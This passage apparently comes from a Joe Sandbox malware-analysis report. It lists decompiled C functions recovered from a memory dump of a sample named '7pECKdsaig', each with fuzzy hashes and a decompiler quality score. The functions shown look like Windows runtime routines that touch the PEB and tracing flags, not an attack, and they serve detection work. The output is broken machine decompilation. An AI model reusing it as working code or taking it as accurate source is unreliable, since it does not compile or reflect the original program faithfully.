                            • Instruction Fuzzy Hash: 46116F31B00301A7E731AA2DFC84B15F698FBA1750F15405AF702D7196CBB0D951C755
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 42%
                            			E0171C962(char __ecx) {
                            				signed int _v8;
                            				intOrPtr _v12;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* _t19;
                            				char _t22;
                            				void* _t26;
                            				void* _t27;
                            				char _t32;
                            				char _t34;
                            				void* _t35;
                            				void* _t37;
                            				intOrPtr* _t38;
                            				signed int _t39;
                            
                            				_t41 = (_t39 & 0xfffffff8) - 0xc;
                            				_v8 =  *0x180d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
                            				_t34 = __ecx;
                            				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
                            					_t26 = 0;
                            					L0172EEF0(0x18070a0);
                            					_t29 =  *((intOrPtr*)(_t34 + 0x18));
                            					if(L0179F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
                            						L9:
                            						E0172EB70(_t29, 0x18070a0);
                            						_t19 = _t26;
                            						L2:
                            						_pop(_t35);
                            						_pop(_t37);
                            						_pop(_t27);
                            						return L0175B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
                            					}
                            					_t29 = _t34;
                            					_t26 = E0179F1FC(_t34, _t32);
                            					if(_t26 < 0) {
                            						goto L9;
                            					}
                            					_t38 =  *0x18070c0; // 0x0
                            					while(_t38 != 0x18070c0) {
                            						_t22 =  *((intOrPtr*)(_t38 + 0x18));
                            						_t38 =  *_t38;
                            						_v12 = _t22;
                            						if(_t22 != 0) {
                            							_t29 = _t22;
                            							 *0x180b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
                            							_v12();
                            						}
                            					}
                            					goto L9;
                            				}
                            				_t19 = 0;
                            				goto L2;
                            			}



















                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8d611a3736aec32189d81f369dad32c4702702b15de73898e101d87542028fb9
                            • Instruction ID: 901012a415bfebd36a684ef7c70094a3124ca59365fd77569b80324e1a0a08ef
                            • Opcode Fuzzy Hash: 8d611a3736aec32189d81f369dad32c4702702b15de73898e101d87542028fb9
                            • Instruction Fuzzy Hash: 2811253230060A9BC756EF2DDC85A2BFBE9FB84310B100228E982C3650DF60ED04CBD1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0174002D() {
                            				void* _t11;
                            				char* _t14;
                            				signed char* _t16;
                            				char* _t27;
                            				signed char* _t29;
                            
                            				_t11 = E01737D50();
                            				_t27 = 0x7ffe0384;
                            				if(_t11 != 0) {
                            					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                            				} else {
                            					_t14 = 0x7ffe0384;
                            				}
                            				_t29 = 0x7ffe0385;
                            				if( *_t14 != 0) {
                            					if(E01737D50() == 0) {
                            						_t16 = 0x7ffe0385;
                            					} else {
                            						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                            					}
                            					if(( *_t16 & 0x00000040) != 0) {
                            						goto L18;
                            					} else {
                            						goto L3;
                            					}
                            				} else {
                            					L3:
                            					if(E01737D50() != 0) {
                            						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                            					}
                            					if( *_t27 != 0) {
                            						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
                            							goto L5;
                            						}
                            						if(E01737D50() != 0) {
                            							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                            						}
                            						if(( *_t29 & 0x00000020) == 0) {
                            							goto L5;
                            						}
                            						L18:
                            						return 1;
                            					} else {
                            						L5:
                            						return 0;
                            					}
                            				}
                            			}









                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                            • Instruction ID: 5781f0c0f85bae9c8d4524f2fc4b6815ae05b12f9117b817b82e8ac4c55e023a
                            • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                            • Instruction Fuzzy Hash: DC11C8726556828FE723A72CD948B75FFD4AF41754F0900E0EE06876A3D768D841C250
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 69%
                            			E01719080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                            				intOrPtr* _t51;
                            				intOrPtr _t59;
                            				signed int _t64;
                            				signed int _t67;
                            				signed int* _t71;
                            				signed int _t74;
                            				signed int _t77;
                            				signed int _t82;
                            				intOrPtr* _t84;
                            				void* _t85;
                            				intOrPtr* _t87;
                            				void* _t94;
                            				signed int _t95;
                            				intOrPtr* _t97;
                            				signed int _t99;
                            				signed int _t102;
                            				void* _t104;
                            
                            				_push(__ebx);
                            				_push(__esi);
                            				_push(__edi);
                            				_t97 = __ecx;
                            				_t102 =  *(__ecx + 0x14);
                            				if((_t102 & 0x02ffffff) == 0x2000000) {
                            					_t102 = _t102 | 0x000007d0;
                            				}
                            				_t48 =  *[fs:0x30];
                            				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                            					_t102 = _t102 & 0xff000000;
                            				}
                            				_t80 = 0x18085ec;
                            				E01732280(_t48, 0x18085ec);
                            				_t51 =  *_t97 + 8;
                            				if( *_t51 != 0) {
                            					L6:
                            					return L0172FFB0(_t80, _t97, _t80);
                            				} else {
                            					 *(_t97 + 0x14) = _t102;
                            					_t84 =  *0x180538c; // 0x77e46828
                            					if( *_t84 != 0x1805388) {
                            						_t85 = 3;
                            						asm("int 0x29");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						_push(0x2c);
                            						_push(0x17ef6e8);
                            						E0176D0E8(0x18085ec, _t97, _t102);
                            						 *((char*)(_t104 - 0x1d)) = 0;
                            						_t99 =  *(_t104 + 8);
                            						__eflags = _t99;
                            						if(_t99 == 0) {
                            							L13:
                            							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                            							if(__eflags == 0) {
                            								E017E88F5(_t80, _t85, 0x1805388, _t99, _t102, __eflags);
                            							}
                            						} else {
                            							__eflags = _t99 -  *0x18086c0; // 0x14507b0
                            							if(__eflags == 0) {
                            								goto L13;
                            							} else {
                            								__eflags = _t99 -  *0x18086b8; // 0x0
                            								if(__eflags == 0) {
                            									goto L13;
                            								} else {
                            									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
                            									__eflags =  *((char*)(_t59 + 0x28));
                            									if( *((char*)(_t59 + 0x28)) == 0) {
                            										E01732280(_t99 + 0xe0, _t99 + 0xe0);
                            										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
                            										__eflags =  *((char*)(_t99 + 0xe5));
                            										if(__eflags != 0) {
                            											E017E88F5(0x18085ec, _t85, 0x1805388, _t99, _t102, __eflags);
                            										} else {
                            											__eflags =  *((char*)(_t99 + 0xe4));
                            											if( *((char*)(_t99 + 0xe4)) == 0) {
                            												 *((char*)(_t99 + 0xe4)) = 1;
                            												_push(_t99);
                            												_push( *((intOrPtr*)(_t99 + 0x24)));
                            												L0175AFD0();
                            											}
                            											while(1) {
                            												_t71 = _t99 + 8;
                            												 *(_t104 - 0x2c) = _t71;
                            												_t80 =  *_t71;
                            												_t95 = _t71[1];
                            												 *(_t104 - 0x28) = _t80;
                            												 *(_t104 - 0x24) = _t95;
                            												while(1) {
                            													L19:
                            													__eflags = _t95;
                            													if(_t95 == 0) {
                            														break;
                            													}
                            													_t102 = _t80;
                            													 *(_t104 - 0x30) = _t95;
                            													 *(_t104 - 0x24) = _t95 - 1;
                            													asm("lock cmpxchg8b [edi]");
                            													_t80 = _t102;
                            													 *(_t104 - 0x28) = _t80;
                            													 *(_t104 - 0x24) = _t95;
                            													__eflags = _t80 - _t102;
                            													_t99 =  *(_t104 + 8);
                            													if(_t80 != _t102) {
                            														continue;
                            													} else {
                            														__eflags = _t95 -  *(_t104 - 0x30);
                            														if(_t95 !=  *(_t104 - 0x30)) {
                            															continue;
                            														} else {
                            															__eflags = _t95;
                            															if(_t95 != 0) {
                            																_t74 = 0;
                            																 *(_t104 - 0x34) = 0;
                            																_t102 = 0;
                            																__eflags = 0;
                            																while(1) {
                            																	 *(_t104 - 0x3c) = _t102;
                            																	__eflags = _t102 - 3;
                            																	if(_t102 >= 3) {
                            																		break;
                            																	}
                            																	__eflags = _t74;
                            																	if(_t74 != 0) {
                            																		L49:
                            																		_t102 =  *_t74;
                            																		__eflags = _t102;
                            																		if(_t102 != 0) {
                            																			_t102 =  *(_t102 + 4);
                            																			__eflags = _t102;
                            																			if(_t102 != 0) {
                            																				 *0x180b1e0(_t74, _t99);
                            																				 *_t102();
                            																			}
                            																		}
                            																		do {
                            																			_t71 = _t99 + 8;
                            																			 *(_t104 - 0x2c) = _t71;
                            																			_t80 =  *_t71;
                            																			_t95 = _t71[1];
                            																			 *(_t104 - 0x28) = _t80;
                            																			 *(_t104 - 0x24) = _t95;
                            																			goto L19;
                            																		} while (_t74 == 0);
                            																		goto L49;
                            																	} else {
                            																		_t82 = 0;
                            																		__eflags = 0;
                            																		while(1) {
                            																			 *(_t104 - 0x38) = _t82;
                            																			__eflags = _t82 -  *0x18084c0;
                            																			if(_t82 >=  *0x18084c0) {
                            																				break;
                            																			}
                            																			__eflags = _t74;
                            																			if(_t74 == 0) {
                            																				_t77 = E017E9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
                            																				__eflags = _t77;
                            																				if(_t77 == 0) {
                            																					_t74 = 0;
                            																					__eflags = 0;
                            																				} else {
                            																					_t74 = _t77 + 0xfffffff4;
                            																				}
                            																				 *(_t104 - 0x34) = _t74;
                            																				_t82 = _t82 + 1;
                            																				continue;
                            																			}
                            																			break;
                            																		}
                            																		_t102 = _t102 + 1;
                            																		continue;
                            																	}
                            																	goto L20;
                            																}
                            																__eflags = _t74;
                            															}
                            														}
                            													}
                            													break;
                            												}
                            												L20:
                            												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
                            												 *((char*)(_t99 + 0xe5)) = 1;
                            												 *((char*)(_t104 - 0x1d)) = 1;
                            												goto L21;
                            											}
                            										}
                            										L21:
                            										 *(_t104 - 4) = 0xfffffffe;
                            										E0171922A(_t99);
                            										_t64 = E01737D50();
                            										__eflags = _t64;
                            										if(_t64 != 0) {
                            											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                            										} else {
                            											_t67 = 0x7ffe0386;
                            										}
                            										__eflags =  *_t67;
                            										if( *_t67 != 0) {
                            											_t67 = E017E8B58(_t99);
                            										}
                            										__eflags =  *((char*)(_t104 - 0x1d));
                            										if( *((char*)(_t104 - 0x1d)) != 0) {
                            											__eflags = _t99 -  *0x18086c0; // 0x14507b0
                            											if(__eflags != 0) {
                            												__eflags = _t99 -  *0x18086b8; // 0x0
                            												if(__eflags == 0) {
                            													_t94 = 0x18086bc;
                            													_t87 = 0x18086b8;
                            													goto L27;
                            												} else {
                            													__eflags = _t67 | 0xffffffff;
                            													asm("lock xadd [edi], eax");
                            													if(__eflags == 0) {
                            														E01719240(_t80, _t99, _t99, _t102, __eflags);
                            													}
                            												}
                            											} else {
                            												_t94 = 0x18086c4;
                            												_t87 = 0x18086c0;
                            												L27:
                            												E01749B82(_t80, _t87, _t94, _t99, _t102, __eflags);
                            											}
                            										}
                            									} else {
                            										goto L13;
                            									}
                            								}
                            							}
                            						}
                            						return E0176D130(_t80, _t99, _t102);
                            					} else {
                            						 *_t51 = 0x1805388;
                            						 *((intOrPtr*)(_t51 + 4)) = _t84;
                            						 *_t84 = _t51;
                            						 *0x180538c = _t51;
                            						goto L6;
                            					}
                            				}
                            			}





















                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 86%
                            			E017E4015(signed int __eax, signed int __ecx) {
                            				void* __ebx;
                            				void* __edi;
                            				signed char _t10;
                            				signed int _t28;
                            
                            				_push(__ecx);
                            				_t28 = __ecx;
                            				asm("lock xadd [edi+0x24], eax");
                            				_t10 = (__eax | 0xffffffff) - 1;
                            				if(_t10 == 0) {
                            					_t1 = _t28 + 0x1c; // 0x1e
                            					E01732280(_t10, _t1);
                            					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                            					E01732280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x18086ac);
                            					E0171F900(0x18086d4, _t28);
                            					L0172FFB0(0x18086ac, _t28, 0x18086ac);
                            					 *((intOrPtr*)(_t28 + 0x20)) = 0;
                            					L0172FFB0(0, _t28, _t1);
                            					_t18 =  *((intOrPtr*)(_t28 + 0x94));
                            					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
                            						L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
                            					}
                            					_t10 = L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                            				}
                            				return _t10;
                            			}








                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 79%
                            			E017D138A(void* __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                            				signed int _v8;
                            				intOrPtr _v16;
                            				intOrPtr _v20;
                            				intOrPtr _v24;
                            				intOrPtr _v28;
                            				short _v54;
                            				char _v60;
                            				void* __edi;
                            				void* __esi;
                            				signed char* _t21;
                            				void* _t27;
                            				intOrPtr _t33;
                            				intOrPtr _t34;
                            				signed int _t35;
                            
                            				_t32 = __edx;
                            				_t27 = __ebx;
                            				_v8 =  *0x180d360 ^ _t35;
                            				_t33 = __edx;
                            				_t34 = __ecx;
                            				E0175FA60( &_v60, 0, 0x30);
                            				_v20 = _a4;
                            				_v16 = _a8;
                            				_v28 = _t34;
                            				_v24 = _t33;
                            				_v54 = 0x1033;
                            				if(E01737D50() == 0) {
                            					_t21 = 0x7ffe0388;
                            				} else {
                            					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                            				}
                            				_push( &_v60);
                            				_push(0x10);
                            				_push(0x20402);
                            				return L0175B640(E01759AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34,  *_t21 & 0x000000ff);
                            			}


















                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 91%
                            			E017158EC(void* __ecx) {
                            				signed int _v8;
                            				char _v28;
                            				char _v44;
                            				char _v76;
                            				void* __edi;
                            				void* __esi;
                            				intOrPtr _t10;
                            				intOrPtr _t16;
                            				void* _t17;
                            				void* _t27;
                            				intOrPtr _t28;
                            				signed int _t29;
                            
                            				_v8 =  *0x180d360 ^ _t29;
                            				_t10 =  *[fs:0x30];
                            				_t27 = __ecx;
                            				if(_t10 == 0) {
                            					L6:
                            					_t28 = 0x16f5c80;
                            				} else {
                            					_t16 =  *((intOrPtr*)(_t10 + 0x10));
                            					if(_t16 == 0) {
                            						goto L6;
                            					} else {
                            						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
                            					}
                            				}
                            				if(E01715943() != 0 &&  *0x1805320 > 5) {
                            					E01797B5E( &_v44, _t27);
                            					_t22 =  &_v28;
                            					E01797B5E( &_v28, _t28);
                            					_t11 = E01797B9C(0x1805320, 0x16fbf15,  &_v28, _t22, 4,  &_v76);
                            				}
                            				return L0175B640(_t11, _t17, _v8 ^ _t29, 0x16fbf15, _t27, _t28);
                            			}
















                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 54%
                            			E017E1074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
                            				char _v8;
                            				intOrPtr _v11;
                            				unsigned int _v12;
                            				intOrPtr _v15;
                            				void* __esi;
                            				void* __ebp;
                            				unsigned int _t13;
                            				char* _t16;
                            				signed int* _t35;
                            
                            				_t22 = __ebx;
                            				_t35 = __ecx;
                            				_v8 = __edx;
                            				_t13 =  !( *__ecx) + 1;
                            				_v12 = _t13;
                            				if(_a4 != 0) {
                            					_push((_t13 >> 0x14) + (_t13 >> 0x14));
                            					L017E165E(__ebx, 0x1808ae4, (__edx -  *0x1808b04 >> 0x14) + (__edx -  *0x1808b04 >> 0x14), __edi, __ecx, (__edx -  *0x1808b04 >> 0x14) + (__edx -  *0x1808b04 >> 0x14));
                            				}
                            				_push( *((intOrPtr*)(_t35 + 0x38)));
                            				_push( *((intOrPtr*)(_t35 + 0x34)));
                            				_push(0x8000);
                            				L017DAFDE( &_v8,  &_v12);
                            				if(E01737D50() == 0) {
                            					_t16 = 0x7ffe0388;
                            				} else {
                            					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                            				}
                            				if( *_t16 != 0) {
                            					_t16 = L017CFE3F(_t22, _t35, _v11, _v15);
                            				}
                            				return _t16;
                            			}













                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0172B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
                            				signed char _t11;
                            				signed char* _t12;
                            				intOrPtr _t24;
                            				signed short* _t25;
                            
                            				_t25 = __edx;
                            				_t24 = __ecx;
                            				_t11 = ( *[fs:0x30])[0x50];
                            				if(_t11 != 0) {
                            					if( *_t11 == 0) {
                            						goto L1;
                            					}
                            					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
                            					L2:
                            					if( *_t12 != 0) {
                            						_t12 =  *[fs:0x30];
                            						if((_t12[0x240] & 0x00000004) == 0) {
                            							goto L3;
                            						}
                            						if(E01737D50() == 0) {
                            							_t12 = 0x7ffe0385;
                            						} else {
                            							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
                            						}
                            						if(( *_t12 & 0x00000020) == 0) {
                            							goto L3;
                            						}
                            						return E01797016(_a4, _t24, 0, 0, _t25, 0);
                            					}
                            					L3:
                            					return _t12;
                            				}
                            				L1:
                            				_t12 = 0x7ffe0384;
                            				goto L2;
                            			}








                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 77%
                            			E017E8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                            				signed int _v12;
                            				intOrPtr _v24;
                            				intOrPtr _v28;
                            				intOrPtr _v32;
                            				intOrPtr _v36;
                            				intOrPtr _v40;
                            				short _v66;
                            				char _v72;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed char* _t18;
                            				signed int _t32;
                            
                            				_t29 = __edx;
                            				_v12 =  *0x180d360 ^ _t32;
                            				_t31 = _a8;
                            				_t30 = _a12;
                            				_v66 = 0x1c20;
                            				_v40 = __ecx;
                            				_v36 = __edx;
                            				_v32 = _a4;
                            				_v28 = _a8;
                            				_v24 = _a12;
                            				if(E01737D50() == 0) {
                            					_t18 = 0x7ffe0386;
                            				} else {
                            					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                            				}
                            				_push( &_v72);
                            				_push(0x14);
                            				_push(0x20402);
                            				return L0175B640(E01759AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31,  *_t18 & 0x000000ff);
                            			}

















                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0171DB60(intOrPtr* __ecx) {
                            				intOrPtr* _t9;
                            				void* _t12;
                            				void* _t13;
                            				intOrPtr _t14;
                            
                            				_t9 = __ecx;
                            				_t14 = 0;
                            				if(__ecx == 0 ||  *__ecx != 0) {
                            					_t13 = 0xc000000d;
                            				} else {
                            					_t14 = E0171DB40();
                            					if(_t14 == 0) {
                            						_t13 = 0xc0000017;
                            					} else {
                            						_t13 = L0171E7B0(__ecx, _t12, _t14, 0xfff);
                            						if(_t13 < 0) {
                            							L0171E8B0(__ecx, _t14, 0xfff);
                            							L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
                            							_t14 = 0;
                            						} else {
                            							_t13 = 0;
                            							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
                            						}
                            					}
                            				}
                            				 *_t9 = _t14;
                            				return _t13;
                            			}








                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                            • Instruction ID: 5dd28bbcddf37735b4fa80aa8bc1cbb90cf7e85529b9e3c04e1d819a22edfab4
                            • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                            • Instruction Fuzzy Hash: 35F068732415239BD7375ADDC88CB67F696AFD1A60F150075B6069B24CCE6088029AD1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0171B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
                            				signed char* _t13;
                            				intOrPtr _t22;
                            				char _t23;
                            
                            				_t23 = __edx;
                            				_t22 = __ecx;
                            				if(E01737D50() != 0) {
                            					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
                            				} else {
                            					_t13 = 0x7ffe0384;
                            				}
                            				if( *_t13 != 0) {
                            					_t13 =  *[fs:0x30];
                            					if((_t13[0x240] & 0x00000004) == 0) {
                            						goto L3;
                            					}
                            					if(E01737D50() == 0) {
                            						_t13 = 0x7ffe0385;
                            					} else {
                            						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
                            					}
                            					if(( *_t13 & 0x00000020) == 0) {
                            						goto L3;
                            					}
                            					return E01797016(0x14a4, _t22, _t23, _a4, _a8, 0);
                            				} else {
                            					L3:
                            					return _t13;
                            				}
                            			}







                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                            • Instruction ID: fdb5dde9d756f5abc2c8489373a60dba1ea5e822f4360d04cb2fbfeb65a5978c
                            • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                            • Instruction Fuzzy Hash: 9A01F432204684DBD726A76DC808FA9FBA8EF91750F0A00A1FA158B6B6E778C940C314
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 73%
                            			E017D131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                            				signed int _v8;
                            				intOrPtr _v12;
                            				intOrPtr _v16;
                            				intOrPtr _v20;
                            				intOrPtr _v24;
                            				short _v50;
                            				char _v56;
                            				signed char* _t18;
                            				void* _t24;
                            				void* _t30;
                            				void* _t31;
                            				signed int _t32;
                            
                            				_t29 = __edx;
                            				_v8 =  *0x180d360 ^ _t32;
                            				_v20 = _a4;
                            				_v12 = _a8;
                            				_v24 = __ecx;
                            				_v16 = __edx;
                            				_v50 = 0x1021;
                            				if(E01737D50() == 0) {
                            					_t18 = 0x7ffe0380;
                            				} else {
                            					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                            				}
                            				_push( &_v56);
                            				_push(0x10);
                            				_push(0x20402);
                            				return L0175B640(E01759AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31,  *_t18 & 0x000000ff);
                            			}
















                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ad14eb9656cf4a826954667948211a5a7bf54804ecdab47e6c88938df2f4763c
                            • Instruction ID: 4e06d3d77500ba18e587884a18cb91f936b0ec87baa36301e89c3c10592c0641
                            • Opcode Fuzzy Hash: ad14eb9656cf4a826954667948211a5a7bf54804ecdab47e6c88938df2f4763c
                            • Instruction Fuzzy Hash: 070119B1A0120DAFCB44EFA9D549AAEB7F4EF58700F408059F905EB391EA749A00CB54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0173C577(void* __ecx, char _a4) {
                            				void* __esi;
                            				void* __ebp;
                            				void* _t17;
                            				void* _t19;
                            				void* _t20;
                            				void* _t21;
                            
                            				_t18 = __ecx;
                            				_t21 = __ecx;
                            				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || L0173C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x16f11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                            					__eflags = _a4;
                            					if(__eflags != 0) {
                            						L10:
                            						E017E88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                            						L9:
                            						return 0;
                            					}
                            					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                            					if(__eflags == 0) {
                            						goto L10;
                            					}
                            					goto L9;
                            				} else {
                            					return 1;
                            				}
                            			}










                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8f103a9584ab05984124b7eb320dd9835554814a01c9daee5011a1f0a981d489
                            • Instruction ID: be66a65faadaf8b35c4320e80a9446387b9931c042c4fec8e6fbec21d227e5c9
                            • Opcode Fuzzy Hash: 8f103a9584ab05984124b7eb320dd9835554814a01c9daee5011a1f0a981d489
                            • Instruction Fuzzy Hash: D0F024B28152908FE733EB1CC008B22FFD49B85370F7484A7D545A31C3C2A0C880C250
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 68%
                            			E017E8D34(intOrPtr __ecx, intOrPtr __edx) {
                            				signed int _v8;
                            				intOrPtr _v12;
                            				intOrPtr _v16;
                            				short _v42;
                            				char _v48;
                            				signed char* _t12;
                            				void* _t18;
                            				void* _t24;
                            				void* _t25;
                            				signed int _t26;
                            
                            				_t23 = __edx;
                            				_v8 =  *0x180d360 ^ _t26;
                            				_v16 = __ecx;
                            				_v42 = 0x1c2b;
                            				_v12 = __edx;
                            				if(E01737D50() == 0) {
                            					_t12 = 0x7ffe0386;
                            				} else {
                            					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                            				}
